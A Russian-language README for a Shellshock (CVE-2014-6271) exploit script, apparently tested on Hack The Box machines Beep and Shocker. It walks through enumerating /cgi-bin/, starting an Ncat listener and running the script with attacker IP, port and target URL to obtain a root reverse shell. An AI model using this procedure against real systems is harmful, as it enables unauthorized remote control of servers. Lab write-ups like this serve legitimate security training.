
Эксплойт Shellshock, также известный как CVE-2014-6271
Эксплойт Shellshock, он же CVE-2014-6271.
Протестировано на Bash 3.2 и Bash 4.2.
Для получения дополнительной информации об уязвимости посетите: https://nvd.nist.gov/vuln/detail/CVE-2014-6271
Эксплойт в основном тестировался на Hack The Box на следующих машинах:
Beep: https://app.hackthebox.eu/machines/BeepShocker: https://app.hackthebox.eu/machines/ShockerВ противном случае, если у вас есть 403 на директории /cgi-bin/, попробуйте перечислить файлы
в этой директории с хорошим списком слов, ища расширения .sh или .cgi.
ПРИМЕЧАНИЕ: Не забудьте настроить ваш TCP-слушатель, иначе эксплойт может выдать вам
ложноположительный результат (false positive) во время проверки вызова testRevShell
Прежде всего мы можем увидеть аргументы, которые принимает эксплойт, запустив: shellshock.py -h
Затем мы можем настроить слушатель Ncat на выбранном нами порту, здесь я выбрал 45
Далее мы можем запустить эксплойт, передав все необходимые аргументы, выполнив:
shellshock.py [OUR_IP] [OUR_LISTENNING_PORT] [TARGET_URL]
Целевой URL, как вы можете видеть, это адрес, на который веб-сервер отправляет POST-запрос во время аутентификации на той машине
Здесь, как мы видим в выводе, эксплойт пытался отправить полезную нагрузку (payload) через SSL, используя несколько версий TLS, пока это не удалось
И вот мы получили наш reverse shell! К счастью, веб-сервер работал от root.